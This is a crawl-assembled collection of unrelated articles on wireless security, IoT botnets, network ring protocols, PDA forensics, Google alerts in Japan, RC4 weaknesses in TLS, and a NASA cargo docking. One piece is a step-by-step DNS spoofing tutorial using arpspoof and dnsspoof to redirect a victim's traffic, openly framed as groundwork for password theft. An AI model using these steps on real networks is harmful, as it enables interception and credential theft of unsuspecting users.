Disabling DHCP: Dynamic Host Configuration Protocol (DHCP) provides the automatic assignment of Internet Protocol (IP) addresses for the clients associating with the wireless network. Disabling DHCP has little to no security value, as it would take a determined intruder fewer than 10 minutes to determine the IP assignment scheme and bypass security controls.
The Real Deal
Now that we are aware of how not to secure a wireless network, how should we?
Start with physical access control. Walls and physical boundaries provide little to no protection against wireless security threats. Nevertheless, it is imperative that wireless security measures are supplemented with physical security controls such as gated access, motion detectors, closed-circuit televisio | <urn:uuid:2dbb8422-018f-49ee-89b9-9a1b3be9832a> | CC-MAIN-2017-09 | http://certmag.com/managing-security-risks-in-a-wireless-world/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171706.94/warc/CC-MAIN-20170219104611-00609-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.927546 | 1,530 | 2.703125 | 3 |
Future Shock: The Internet of Compromised Things It's doubtful that the average consumer would be aware that his or her refrigerator was participating in a DDoS attack. Even fewer would have any idea how to stop it.
If it contains software, it can be hacked. If it is connected to the Internet, it can be hacked remotely. This is the unfortunate reality of the state of computer software. It should come as no surprise that an Internet enabled smart-fridge can be subverted to send spam emails.
Writing software is tricky. The overabundance of failed software projects that clutter every organization is evidence of just how hard it is to write software that works as intended. For software to be secure, it must do what it is supposed to do and nothing else. The goal of a hacker is to find a way of tricking software into performing functions that it was not designed to do. By this route the attacker may be able to take control of the system and use it to execute the attacker’s commands.
Unfortunately, this is often all too easy. The same flaws in code are found over and over again. Inputs are not validated. Buffers can be overrun. Software runs with too many privileges. The results are that attackers are able to subvert systems to execute malicious instructions. What surprises me most is that we know how to fix these issues during the development process. We know how to write code without these potential vulnerabilities. We know how to review code to spot weaknesses. We know how to test code to catch failings before it is ever released. However, reviewing code and security testing are time consuming. Neither are their benefits immediately apparent in the product. The result is that they tend to get dropped when deadlines loom, if they were ever envisaged at all.
What’s more, even if your code has been verified and found to be secure, the same cannot be said for the third-party code with which it interacts. External libraries or the operating system may contain vulnerabilities that may affect your system, even if the code that you write is completely secure.
Patch Tuesday for your toaster?
The accepted method for remediating insecure code is to download and install updates to replace the vulnerable code. But how exactly do you update the software on your fridge or toaster? As increasing numbers of household devices are sold as Internet connected, it’s only natural to assume that the number of compromised devices is going to ramp up. The question, then, becomes: What can an attacker do with a compromised device, such as a refrigerator or a smart-TV? The information contained within these devices would hardly be worth stealing. However, spare processor and network capacity can be harnessed to become part of a botnet and participate in denial of service attacks, send spam, and even mine bitcoins.
One possible solution might be to screen Internet connections to things in order to detect and stop hacking attacks, block communication with botnet command and control servers, and bar any device that is not an email server from sending email. This would be considered usual within a corporate environment, but consumers are unlikely to have anything other than the simplest firewall on home networks. Nor are they likely to be aware that their fridges are spamming, let alone have the knowledge to remedy the situation.
On a personal level, and as a security professional, I’m not too troubled by the prospect of a spamming fridge. I can blacklist the offending IP address in the unlikely event that a corporate email server accepted an email sent from a consumer ISP IP address range. My biggest concern is what the Internet of Compromised Things represents on the cyber-security front. As cyber-criminals improve their skills in identifying and compromising embedded software in Internet-enabled devices, they will have more devices under their control. They will have greater capacities to launch denial-of-service and hacking attacks against embedded systems that control our home and working environments, such as those running heating, air-conditioning, and water pumps.
I hope that this column serves as a wake-up call for both consumers and the security industry. We need to take stock of the Internet enabled devices on our networks, and, as a minimum, start demanding that these devices are properly secured and guaranteed by manufacturers. Let’s chat about what that would mean in the comments.
Martin Lee is Technical Lead within Cisco’s TRAC team, where he researches the latest developments in cyber security and delivers expert opinion on how to mitigate emerging threats and related risks. | <urn:uuid:c4055eb6-292a-4d9e-ab78-f23eac50b8cb> | CC-MAIN-2017-09 | http://www.darkreading.com/vulnerabilities-and-threats/future-shock-the-internet-of-compromised-things-/d/d-id/1113550?piddl_msgorder=thrd | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00133-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.963085 | 925 | 2.75 | 3 |
Black Box Explains Spanning Tree and Alpha Ring Protocols
As computer networks have become mission-critical assets for most, if not all, businesses, keeping the network up and running has assumed a crucial importance. Just as there are different types of traffic that run over a computer network, there are different solutions to keeping that traffic flowing,each with its own pros and cons.
Spanning Tree Protocol (STP)
The Spanning Tree Protocol (standardized as IEEE 802.1d) specifies a network design with redundant links to provide automatic backup paths if an active link fails. STP also avoids the creation of bridge loops that cause broadcast storms. Without STP, Ethernet switches with redundant links have no standardized way to keep from looping data over and over again to the other switches in the network, eventually disabling the network’s ability to pass data.
The idea behind a Spanning Tree topology is to enable switches to automatically discover a subset of the network topology that is loop-free, i.e., a tree. With STP turned on, the switches will perform the spanning tree algorithm when they are first connected, as well as any time there is a topology change, and automatically communicate with each other in a loop-free mode. Then, should a failure of one of the active links occur, STP unblocks the redundant links to enable the network to continue transmitting traffic.
The Alpha-Ring Protocol
The Alpha-Ring protocol is a proprietary protocol designed to provide a faster network recovery time after a failure than standard STP. As the name suggests, Alpha-Ring enables the switches to be organized in a ring arrangement. During normal operation, the backup path for the Alpha-Ring is blocked, and data follows the other links around the ring.
If, however, one of the active links fails, the Alpha-Ring protocol unblocks the backup path to enable data to keep flowing. Typical failover for Alpha-Ring protocol is less than 30 milliseconds.
In addition, unlike STP, Alpha-Ring does not operate using any bandwidth-consuming packets to check the ring status. The ring port connections are monitored by each switch individually without the need for test packets to be generated and transmitted around the ring.
Ethernet Ring Protocols
Although Ethernet is usually thought of as having a star or bus topology, it’s also possible to build an Ethernet network as a ring. This configuration has the advantage of providing a redundant pathway if a link goes down. A ring topology is often used in applications such as traffic signals and surveillance where long distances may make it difficult to run links in a star formation from a central switch and where downtime must be limited.
Generally speaking, ring architectures have these advantages:
1. They have fast failover times, typically sub-50ms.
2. They require a decreased number of ports. Fewer ports are needed to provide the same amount of resiliency as centralized switched networks with redundant paths. This results in decreased initial investment and lower ongoing maintenance costs.
3. They are scalable and enable a step-by-step network rollout. More switches can be added to the ring incrementally. The full traffic does not need to traverse a main/distribution switch.
4. They use bandwidth efficiently; dedicated paths are not required.
5. They simplify configuration. Predefined paths between the switches that are connected to the ring are not needed. | <urn:uuid:07f68c30-4cd8-49fe-a951-01957ce550fe> | CC-MAIN-2017-09 | https://www.blackbox.com/en-pr/products/black-box-explains/spanning-tree-and-alpha-ring-protocols | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174276.22/warc/CC-MAIN-20170219104614-00485-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.930059 | 703 | 3.546875 | 4 |
NIST looks at forensics tools for handheld devices
- By William Jackson
- Sep 13, 2004
As crime goes high-tech, investigators need to be familiar with techniques and tools for gathering, preserving, analyzing and documenting data from digital devices.
Handheld devices, such as personal digital assistants, are a distinct class of computers that are becoming increasingly common and offer their own forensic challenges.
The National Institute of Standards and Technology has evaluated some software tools currently available to investigators for gathering evidence from PDAs.
The interagency report
, PDA Forensic Tools: An Overview and Analysis, focuses on two operating systems that account for the majority of handheld devices, Palm OS and Pocket PC, as well as some miscellaneous tools for Linux-based PDAs.
NIST evaluated the tools in a number of scenarios, on equipment ranging from a 16-MHz processor with 2M of ROM and 8M of RAM to a 400-MHz processor with 48M of ROM and 128M of RAM. The tools evaluated are:
- PDA Seizure from Paraben Corp. of Orem, Utah
- EnCase from Guidance Software Inc. of Pasadena, Calif.
- Palm dd from @state Inc. of Cambridge, Mass.
- Palm OS Emulator from PalmSource Inc. of Sunnyvale, Calif.
- The open-source Pilot Link product
- The Duplicate Disk Unix utility
The evaluation was not comprehensive or a formal product test. Those efforts are being conducted by the Computer Forensics Tool Testing project, a NIST program being carried out in conjunction with law enforcement and investigative organizations in the departments of Defense, Homeland Security and Justice.
William Jackson is a Maryland-based freelance writer. | <urn:uuid:d9ab4fb7-0cdc-4d6e-bd5d-7bc85a509f42> | CC-MAIN-2017-09 | https://gcn.com/articles/2004/09/13/nist-looks-at-forensics-tools-for-handheld-devices.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00077-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.914515 | 352 | 2.578125 | 3 |
Google Street View Documenting Japan's Nuke Evacuation Area
In a related move, Google has announced that it now offers Google Public Alerts in Japan to help with emergency preparedness due to the ongoing risks of earthquakes and tsunamis in the region. "With nearly 5,000 earthquakes a year, it's important for people in Japan to have crisis preparedness and response information available at their fingertips," Yu Chen, partner technology manager at Google Maps, wrote in a March 6 post on the Google Maps Blog. "And from our own research, we know that when a disaster strikes, people turn to the Internet for more information about what is happening." The new Google public alerts service in Japan is the first such offering outside the United States, where Google has been offering alerts since January 2012. The alerts aim to provide accurate and relevant emergency notifications when and where people are searching for information online. "Relevant earthquake and tsunami warnings for Japan will now appear on Google Search, Google Maps and Google Now when you search online during a time of crisis," the post explained. "If a major earthquake alert is issued in Kanagawa Prefecture, for example, the alert information will appear on your desktop and mobile screens when you search for relevant information on Google Search and Google Maps."The Japan alerts are being created in conjunction with the Japan Meteorological Agency, which provides critical real-time data to alert the public, the post said. "We hope our technology, including Public Alerts, will help people better prepare for future crises and create more far-reaching support for crisis recovery," wrote Yu Chen. "This is why in Japan, Google has newly partnered with 14 Japanese prefectures and cities, including seven from the Tōhoku region, to make their government data available online and more easily accessible to users, both during a time of crisis and after." Google is planning to expand its Google Public Alerts to additional countries around the world in the future.
Users in Japan will also be able to access the alerts on their mobile devices when they use Google Now on their Android devices. | <urn:uuid:cdb7a64e-b746-4562-95b7-ab9eca22675b> | CC-MAIN-2017-09 | http://www.eweek.com/cloud/google-street-view-documenting-japans-nuke-evacuation-area-2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00429-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.950626 | 422 | 2.703125 | 3 |
A new algorithm uses cutting-edge techniques to help computers identify human activity from video input far more quickly and efficiently than previous systems.
Its inventors, MIT post-doc Hamed Pirsiavash and University of California at Irvine professor Deva Ramanan, will present the algorithm at the Conference on Computer Vision and Pattern Recognition in Columbus, Ohio next month, according to a statement from MIT.
+ALSO ON NETWORK WORLD: Microsoft: We're serious this time; XP's dead to us | Net neutrality advocates flood FCC Twitter chat +
The researchers drew on natural language processing techniques similar to those used in IBM's Watson and other emergent machine learning projects to create a "grammar" for each action they wanted the system to recognize.
Pirsiavash and Ramanan's creation scales search times in a linear way, meaning that a video 10 times the length of another video will take 10 times as long to search some previous techniques would have taken 1,000 times as long. Additionally, the new algorithm can handle streaming video, because it can guess fairly accurately at the results of partial actions before they are completed.
Pirsiavash said in the statement that the process is much like the one a system such as Watson would use to diagram a sentence. Complicated actions are broken down into their component parts and the algorithm simply looks for a pattern that fits the grammar."When you make tea, for instance, it doesn't matter whether you first put the teabag in the cup or put the kettle on the stove. But it's essential that you put the kettle on the stove before pouring the water into the cup," he said.
Pirsiavash told Network World that he doesn't know when his algorithm might show up in real-world applications, but said it's definitely going to do so at some point.
"There are many companies working on commercializing computer vision systems," he said. "I am sure automatic action recognition will also be used in real products soon."
Email Jon Gold at firstname.lastname@example.org and follow him on Twitter at @NWWJonGold.
Read more about data center in Network World's Data Center section. | <urn:uuid:62eb263a-34a4-4fba-a31d-287fdff9924f> | CC-MAIN-2017-09 | http://www.computerworld.com.au/article/545104/computer_knows_re_bowling_new_algorithm_identifies_human_activity_from_video/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171463.89/warc/CC-MAIN-20170219104611-00129-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.950661 | 448 | 2.921875 | 3 |
By Patricia Resende / CIO Today. Updated October 01, 2009.
Nvidia used the GPU Technology Conference in San Jose, Calif., to show the world it has reached a new milestone in graphics processing. Nvidia demonstrated its next-generation GPU architecture, code-named Fermi. The new architecture will not replace the CPU, but will secure a significant place in PC system architecture.
Fermi's graphics capabilities will mean substantial improvements to game play, multimedia encoding and enhancement, and other PC applications, according to the company.
"It is completely clear that GPUs are now general-purpose parallel computing processors with amazing graphics, and not just graphics chips anymore," said Jen-Hsun Huang, cofounder and CEO of Nvidia. "The Fermi architecture, the integrated tools, libraries and engines are the direct results of the insights we have gained from working with thousands of CUDA (compute unified device architecture) developers around the world."
Huang provided several examples of Fermi's potential. In one demonstration, he created a realistic physical reaction for a game by throwing rag dolls at destructible walls. In another, he showed its value in 3-D stereoscopic video. A third demonstration showed how GPUs can be used to enhance processing of ultrasound recordings to detect breast cancer.
Nvidia said Fermi has increased the performance startup by eight times over Nvidia's last-generation GPU. The increase is critical for high-performance computing applications such as quantum chemistry, linear algebra, and numerical simulation, according to Nvidia. It added that Fermi also provides supercomputing features and performance at one-tenth the cost and one-twentieth the power of traditional CPU-only servers.
The GPU architecture is designed for C++, makes parallel programming easier and increases performance on a greater variety of applications than in the past, the company said. Performance increases are seen in ray tracing, physics, high-precision scientific computing, sparse linear algebra, and sorting and search algorithms, according to Nvidia.
Fermi is also the first GPU to provide error-correcting code (ECC) protection for DRAM, Nvidia said.
Analysts have touted Nvidia's new architecture as the first complete GPU architecture. Because Fermi is derived from Nvidia's graphics products, it ensures the company will sell millions of software-compatible chips to PC gamers, according to Peter Glaskowsky, a senior technology analyst for Envisioneering Group.
Nvidia also garnered support for Fermi from various companies, including Dell, Hewlett-Packard and Microsoft.
But it was Oak Ridge National Laboratory that stepped up to announce it will use Nvidia's GPU architecture for a new supercomputer. The supercomputer, expected to be 10 times more powerful than the current fastest supercomputer, will be used to research energy and climate change.
"This would be the first coprocessing architecture that Oak Ridge has deployed for open science, and we are extremely excited about the opportunities it creates to solve huge scientific challenges," said Jeff Nichols, Oak Ridge associate lab director. | <urn:uuid:080caa92-324d-4b1e-8698-b5d259fa6103> | CC-MAIN-2017-09 | http://www.cio-today.com/article/index.php?story_id=13200G4U7ZO0 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00481-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.928233 | 626 | 2.96875 | 3 |
HTTPS Security Encryption Flaws FoundSecurity researchers find weaknesses that could be exploited to crack some types of encrypted Web communications.
Anonymous: 10 Things We Have Learned In 2013 (click image for larger view and for slideshow)
Security researchers have discovered weaknesses that could be exploited to crack some types of encrypted Web communications.
The flaw exists in the RC4 encryption algorithm that's often used to help secure the SSL/TLS communications that underpin secure (HTTPS) Web pages. The flaw was first disclosed last week by University of Illinois at Chicago professor Dan Bernstein at the Fast Software Encryption conference in Singapore, in a talk titled "Failures of secret-key cryptography" that's based on research he conducted with researchers from University of London's Royal Holloway and the Eindhoven University of Technology in the Netherlands.
"The transport layer security (TLS) protocol aims to provide confidentiality and integrity of data in transit across untrusted networks like the Internet," according to the group's research presentation. "It is widely used to secure Web traffic and e-commerce transactions on the Internet."
[ Are hackers hacking for fun or for profit? Celeb Data Breach Traced To Credit Reporting Site. ]
But RC4, the researchers found, isn't sufficiently random, and with enough time and effort, an attacker could recover some plaintext from a communication secured using TLS and RC4. "We have found a new attack against TLS that allows an attacker to recover a limited amount of plaintext from a TLS connection when RC4 encryption is used," they said. "The attacks arise from statistical flaws in the keystream generated by the RC4 algorithm, which become apparent in TLS ciphertexts when the same plaintext is repeatedly encrypted at a fixed location across many TLS sessions."
The vulnerability has wide-ranging repercussions, given current RC4 use. "Around 50% of all TLS traffic is currently protected using the RC4 algorithm," they said. "It has become increasingly popular because of recent attacks on CBC-mode encryption on TLS, and is now recommended by many commentators." Those CBC-mode encryption attacks have included padding oracle attacks, the BEAST attack against browsers and the Lucky 13 attack that was first disclosed last month.
Some cryptography experts have moved to reassure Internet users that they're in no immediate danger from the RC4 vulnerabilities. "While interesting, the attacks don't represent an immediate practical threat to users of SSL/TLS (including online banking, e-commerce, social networking, etc.)," said Symantec technical director Rick Andrews in a blog posted to the Certificate Authority Security Council website. "Such attacks require an attacker to run malicious software on a user's computer, which would connect to a particular website and send the same message over and over again many times. In fact, if the attacker's software could send the same message over and over 10 times per second, it would still take more than three years for the attack to succeed."
Still, once easily exploitable vulnerabilities have been discovered in an encryption algorithm, it's only a matter of time before more rapid and effective attack techniques get discovered. Furthermore, other researchers -- working at intelligence agencies, for example -- could have already discovered these vulnerabilities and put them to use.
"RC4 shouldn't be around," said Paul Ducklin, head of technology for Sophos in the Asia Pacific region, in a blog post. "Experts have recommended avoiding it completely, at least for any newly written applications, for several years. But replacing or banning RC4 in existing cryptographic implementations is a much trickier problem."
What's the solution? "The most effective countermeasure against our attack is to stop using RC4 in TLS," according to the researchers. "There are other, less-effective countermeasures against our attacks and we are working with a number of TLS software developers to prepare patches and security advisories."
Instead of using RC4, the researchers strongly recommend switching to AEAD cipher suites such as AES-GCM, which are supported in TLS 1.2, which hasn't yet been widely adopted. Another approach, however, could be to use a CBC-mode cipher suite that's been patched against the BEAST and Lucky 13 attacks, and they said many versions of TLS 1.0 and 1.1 do now have such patches.
Symantec's Andrews also emphasized that the discovery of vulnerabilities in RC4 doesn't reveal weaknesses in SSL/TLS. "The designers of the SSL/TLS protocol anticipated that algorithms would become weaker over time, so the protocol was designed to support the easy addition of new algorithms," he said. "Hence a weakness in one algorithm does not mean that SSL/TLS is broken. Newer, stronger algorithms have already been developed and incorporated into the latest implementations of SSL/TLS. What's needed now is for users of Web server and browser software to update to the newest versions to minimize or eliminate the use of weakened algorithms." | <urn:uuid:bba81bc6-686c-467f-a57b-af7a715ed042> | CC-MAIN-2017-09 | http://www.darkreading.com/risk-management/https-security-encryption-flaws-found/d/d-id/1109137?cid=sbx_byte_related_mostpopular_byte_news_apple_motion_to_ban_samsung_products_den&itc=sbx_byte_related_mostpopular_byte_news_apple_motion_to_ban_samsung_products_den | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00481-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.952074 | 1,008 | 3 | 3 |
Agency: NSF | Branch: Standard Grant | Program: | Phase: DISCOVERY RESEARCH K-12 | Award Amount: 449.97K | Year: 2013
Inquiry Primed: An Intervention to Mitigate the Effects of Stereotype Threat is an Exploratory Project in the Teacher Strand of DRK-12 that investigates stereotype threat at the classroom level and in the context of inquiry-based instruction, in order to develop strategies and a related professional development course, using the principles of Universal Design for Learning, to help teachers learn how to mitigate stereotype threat.
The project includes three major activities:
1) An experimental study testing the hypothesis that the influences of stereotype threat on individual students affects instructional processes for the class as a whole: Research participants include three teachers from 3 different school districts in Massachusetts, each with four 8th grade science classes, for a total sample of 12 science classes and approximately 300 students. The two treatment conditions (stereotype threat induced vs. not induced) are applied blindly to three classroom groups over a series of six lessons. The project uses existing surveys for gathering data, including Communicative Interactions, RTOP subscales, subscales of the Constructivist Learning Environment Survey (CLES), and a brief student questionnaire measuring domain salience (e.g., self ranking of degree of participation in class). The analysis is conducted using Ordinary Least Squares (OLS) regression, with predictions of classroom instructional processes based on treatment condition, percentage of students in stereotyped group, and domain salience.
2) Collaboration with teachers as co-researchers to translate research findings into classroom practices and a prototype online professional development course: Three middle school teachers who participated in Study 1 serve as co-researchers, using the Universal Design for Learning model. The product is a prototype, online professional development modules that include self-paced presentations, small group facilitated discussions, asynchronous discussions, and live webcasts with experts, all focused on how teachers can implement strategies to mitigate stereotype threat in their practice. The design elements will be assessed in terms of clarity, accessibility, use, value, and promise.
3) Pilot testing of three professional development modules: The professional development component (via communities of practice) supports classroom teachers as they incorporate these strategies into their daily activities. The three teachers involved in the original study and design of modules participate in a six-week pilot study of the online professional development course, anticipated to consist of three modules, with teachers participating 3-4 hours per week. The course is evaluated through observations of professional development interactions (synchronous and asynchronous), interviews, implementation strategies, Moodle Electronic Usage Logs, online discussions, and a questionnaire. Descriptive statistics and regression analysis are used to seek predictors of use and contributions by teacher characteristics.
The project contributes critical knowledge about stereotype threat, a construct shown to contribute to disparities in achievement in STEM education. The outcomes of the project will include research findings that are to be submitted to science education research journals for publication; a prototype, online teacher professional development course on mitigating stereotype threat in STEM education classrooms; and dissemination of the course to teachers who are part of the CAST and Minority Student Achievement Networks.
Agency: NSF | Branch: Standard Grant | Program: | Phase: RES IN DISABILITIES ED | Award Amount: 367.71K | Year: 2013
The purpose of this empirical study is to explore the prevalence and impact of stigmatization and stereotype threat on mathematics performance among public high school students (grades 9-12) with specific learning disabilities. Using a combination of self-report measures and experimental study, the following questions will be addressed: 1) To what degree are high school students with specific learning disabilities conscious of stigma related to their learning disability in the context of mathematics education?, 2) Is greater stigma consciousness associated with poorer performance in mathematics among high school students with specific learning disabilities?, and 3) Do high school students with specific learning disabilities experience stereotype threat that interferes with performance in mathematics? The severity of learning disability will be controlled in all analyses, and tests of moderation will be employed to explore potentially compounding effects of having a math specific learning disability, being a girl or minority student, or coming from a school where stigma levels around learning disability are high.
The proposed work contributes to Intellectual Merit through advancing potentially transformative knowledge and understanding about the experiences of students with learning disabilities in the context of high school mathematics. The research has the potential to inform and open new avenues of research in the area of stigmatization and stereotype threat for people with disabilities.
In regards to Broader Impacts, the findings from this project will significantly inform understanding of the achievement gaps in math of underrepresented groups, and specifically students with learning disabilities, including women and minorities within this population. Understanding the cognitive and affective experiences of individuals with learning disabilities may facilitate the future development of interventions to remedy the current negative outcomes of students with learning disabilities in mathematics.
CAST Inc | Date: 2013-10-31
A matrix band, including a straight, contoured or sectional matrix band for use in dentistry is described. The matrix band includes a metal or metal alloy strip constructed from titanium, titanium alloy or stainless steel plated with titanium or titanium alloy, which initiates coagulation of the blood, while the polymer coating eliminates capillary action between a tooth and the matrix band while the tooth is being filled.
CAST Inc | Date: 2013-10-30
A matrix band for use in dentistry has a silicone-based, polymer coating applied to a stainless steel or a polyester surface, which reduces or eliminates capillary action between a tooth and the matrix band. The matrix band may include at least one aperture to assist with removal of the matrix band from the tooth.
CAST Inc | Date: 2014-01-21
A system and method for forming a wall is disclosed. In some embodiments, the wall comprises blocks having internal couplers configured for use with rods which can be inserted through and which are configured to securely lock blocks together. In some embodiments, the rods which are inserted into internal couplers may be threaded or have another locking features such that the blocks in a wall can be securely fastened together. | <urn:uuid:390ed9f7-c32a-43a5-b490-2ba48c1a4218> | CC-MAIN-2017-09 | https://www.linknovate.com/affiliation/cast-inc-512806/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00005-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.922991 | 1,276 | 2.65625 | 3 |
Welcome back my fellow hackers! There have been some articles I’ve been wanting to write regarding social engineering, more specifically, stealing passwords. But, in order to do that, there are some basic concepts and methods we needs to have a grasp of. The first of these concepts is Man in the Middle Attacks. Since we’ve already covered that, we’re going to cover the next concept, DNS spoofing. First, we’ll cover what DNS is exactly, then we’ll quickly discuss the anatomy of the DNS spoofing attack, and finally, we’ll perform the attack! So, let’s get started!
What is DNS?
This question is actually fairly simple. DNS stands for Domain Name System. You know when you go to a website using a browser, you type in a URL instead of the IP address of the server? That’s DNS working it’s magic! What DNS does is it keeps track of what IP addresses reside at what URLs, that way we don’t have to remember the addresses, just the URLs! Pretty neat, huh? Like I said, DNS is fairly simple, so let’s move on to the next part, the anatomy of a DNS spoofing attack.
Anatomy of a DNS Spoofing Attack
Since this can be a bit difficult to talk about without a reference, we’re going to be dissecting this attack based on this diagram:
As we can see here, the attacker starts by pretending to be the DNS server. Then, when the victim requests the address for the desired site, the fake server responds with whatever address the attacker wants, which in this case, directs the victim to a fake site. This attack is very simple, but can often play a part in a larger attack. Now that we know the ins and outs of DNS spoofing, let’s perform it ourselves!
Performing a DNS Spoofing Attack
Setting up the Attack
Before we really get started, there are a couple of things that we need to prepare. Namely, we need to prepare the fake website, and set up the configuration file for the DNS spoofing tool.
Let’s start by setting up the website. First, we’ll whip up some basic HTML code so we actually have a site. We’ll be using gedit. The proper file can be opened with the following command:
Now that we have our file open, just go ahead and erase everything in it. I’ll be replacing it with the following:
Feel free to replace the words with whatever you like, as long as you follow the HTML tags, everything should be fine.
Now that we have our website’s HTML code ready, we can go ahead and start the server that will serve the website. We’ll just be using the pre-installed Apache2 webserver, which can be started with the following command:
Now that we have the site up and running, we need to quickly edit the configuration file for the DNS spoofing tool. We’re just going to be modifying the /etc/hosts file and using it for our attack. We can open the file with the same command we used previously, but with the new file path. Once we have the file open, we can set up the file to tell the spoofing tool what sites we want to spoof. Before we do that, we need to know our local IP address, which we can find with the ifconfig command:
We can see that our local IP address is 10.0.0.16. Now that we know it, we can edit the file. We’re just going to be adding this line:
The line we added (the bottom one), will tell the spoofing tool that we want www.hackingloops.com to be redirected to our local IP address, which will then serve them our website instead of the real one! That’s it for the setting up, now it’s time to execute the attack!
Executing the Attack
Now, if we’re going to be redirecting traffic that isn’t ours, we need to be able to read it. This is where the Man in the Middle Attack comes into play. We’re going to place ourselves between the victim and the gateway, so that all of the victim’s DNS requests have to go through us. We can then sniff these requests and redirect them with our spoofed responses! To start, we need to know the gateway’s IP address, which we can find with the route command with the -n flag:
We can see by the above output that the address of the gateway is 10.0.0.1. For the sake of keeping this relatively short, we already have our victim’s address, which is 10.0.0.13. Note that all these addresses are on the same network. This form of DNS spoofing only works if the victim is on your LAN. Now that we have the addresses, we can start the Man in the Middle attack (finally)! We’re going to be using arpspoof for this attack, and we’ll be using the -i, -t, and -r flags to specify the interface to attack on and the addresses to attack:
Once we execute this, the MitM will start.
DO NOT FORGET: You must enable IP forwarding, so the data from the victim doesn’t get hung up on the attacking system. This can be done with this command: echo 1 > /proc/sys/net/ipv4/ip_forward
Now that we have our MitM running, we should have all the victim’s traffic flowing through the attacker system. Since we can see all this traffic, we can start the DNS spoofing tool (dnsspoof) to listen for DNS requests for www.hackingloops.com and respond to them with our IP address! Let’s go ahead and start dnsspoof now. We use the -i flag for giving an interface, and the -f flag for giving the path to the hosts file. The command to start the attack should look something like this:
We can see that dnsspoof is now listening for UDP traffic on port 53 (port 53 is the DNS port, and UDP is the transport protocol DNS uses) from all address but our own! Now that our attack is up and running, let’s move over to our victim PC and try and access www.hackingloops.com from a web browser:
Now, before we celebrate, let’s look back at dnsspoof to see the output:
There we have it! We were able to start a Man in the Middle attack, and use it to perform a DNS spoofing attack, which redirected a legitimate request for www.hackingloops.com to our fake website!
There are multiple reasons for this article. For one, we’ll be needing these attacks very soon in order to steal passwords from an unsuspecting user. Secondly, it’s a proof of concept of sorts. It shows that these smaller attacks (MitM, DNS spoofing, etc.) aren’t just one trick ponies. We can combine these attacks to achieve even greater things. Many times, when performing an actual hack, you will need to combine many different kinds of attacks at once to achieve a goal, this just proves that. I’ll see you next time! | <urn:uuid:ead83764-496e-4d3f-a555-c6f62c3dd699> | CC-MAIN-2017-09 | https://www.hackingloops.com/tag/man-in-the-middle/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00425-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.928587 | 1,576 | 3.015625 | 3 |
The second commercial venture to ink a deal with NASA to run resupply missions to International Space Station successfully docked at the orbiting facility on Sunday.
Astronauts on the space station used a robotic arm to grab hold of the Cygnus cargo spacecraft, built and operated by Orbital Sciences, as it approached the station. Cygnus, carrying 1,300 pounds of food, clothing and experiments, docked at the station at 8:44 a.m. EDT on Sunday after an 11-day journey.
The hatch on the spacecraft is set to be opened on Monday, and the unloading will begin.
"With the successful berthing of the Orbital Sciences Cygnus cargo module to the [space station], we have expanded America's capability for reliably transporting cargo to low-Earth orbit," said NASA Administrator Charles Bolden, in a statement. "It is an historic milestone as this second commercial partner's demonstration mission reaches the [station], and I congratulate Orbital Sciences and the NASA team that worked alongside them to make it happen."
Orbital Sciences joins SpaceX as private companies working with NASA to send cargo to the space station and bring finished experiments and refuse back to Earth. At some point, these commercial crafts are expected to become space taxis, ferrying astronauts back and forth to the station.
SpaceX, the first commercial venture to send a spacecraft to the space station, launched a test flight in 2012 and has been approved to run regular resupply missions.
With Sunday's successful docking, Orbital Sciences now has the same deal.
Now that the long-running space shuttle fleet is retired, NASA is dependent on a young commercial space industry to fly missions to the space station.
At this point, NASA astronauts are flying to the space station on Russian Soyuz rockets. The space agency expects that commercial flights, once they gain more experience and accuracy, will take over that job for NASA.
With commercial companies focusing on near-Earth missions, NASA is working on robotics and heavy-lift engines that should get human explorers to the moon, Mars and asteroids.
"Orbital joins SpaceX in fulfilling the promise of American innovation to maintain America's leadership in space," said Bolden. "As commercial partners demonstrate their new systems for reaching the station, we at NASA continue to focus on the technologies to reach an asteroid and Mars.
"Under President Obama's leadership, the nation is embarking upon an ambitious exploration program that will take us farther into space than we have ever traveled before, while helping create good-paying jobs right here in the United States and inspiring the next generation," he added.
Orbital Sciences's Cygnus was launched on the company's Antares rocket on Sept. 18 from NASA's Wallops Flight Facility in Virginia.
The capsule originally had been set to rendezvous with the space station, which flies about 260 miles above Earth, on Sunday, Sept. 22 - a full week before it did dock with the station.
That planned rendezvous was postponed, however, after engineers discovered a data format mismatch between an onboard space station navigation system and a similar system on Cygnus. The Orbital Sciences team quickly developed and uploaded a software fix.
Once the glitch was repaired, Cygnus' rendezvous with the station was pushed to Sunday so it wouldn't interfere with arrival of three new space station crew members last Wednesday.
Cygnus is scheduled to remain attached to Harmony until Oct. 22. After that, the capsule, carrying refuse from the station, will burn up on re-entry in Earth's atmosphere.
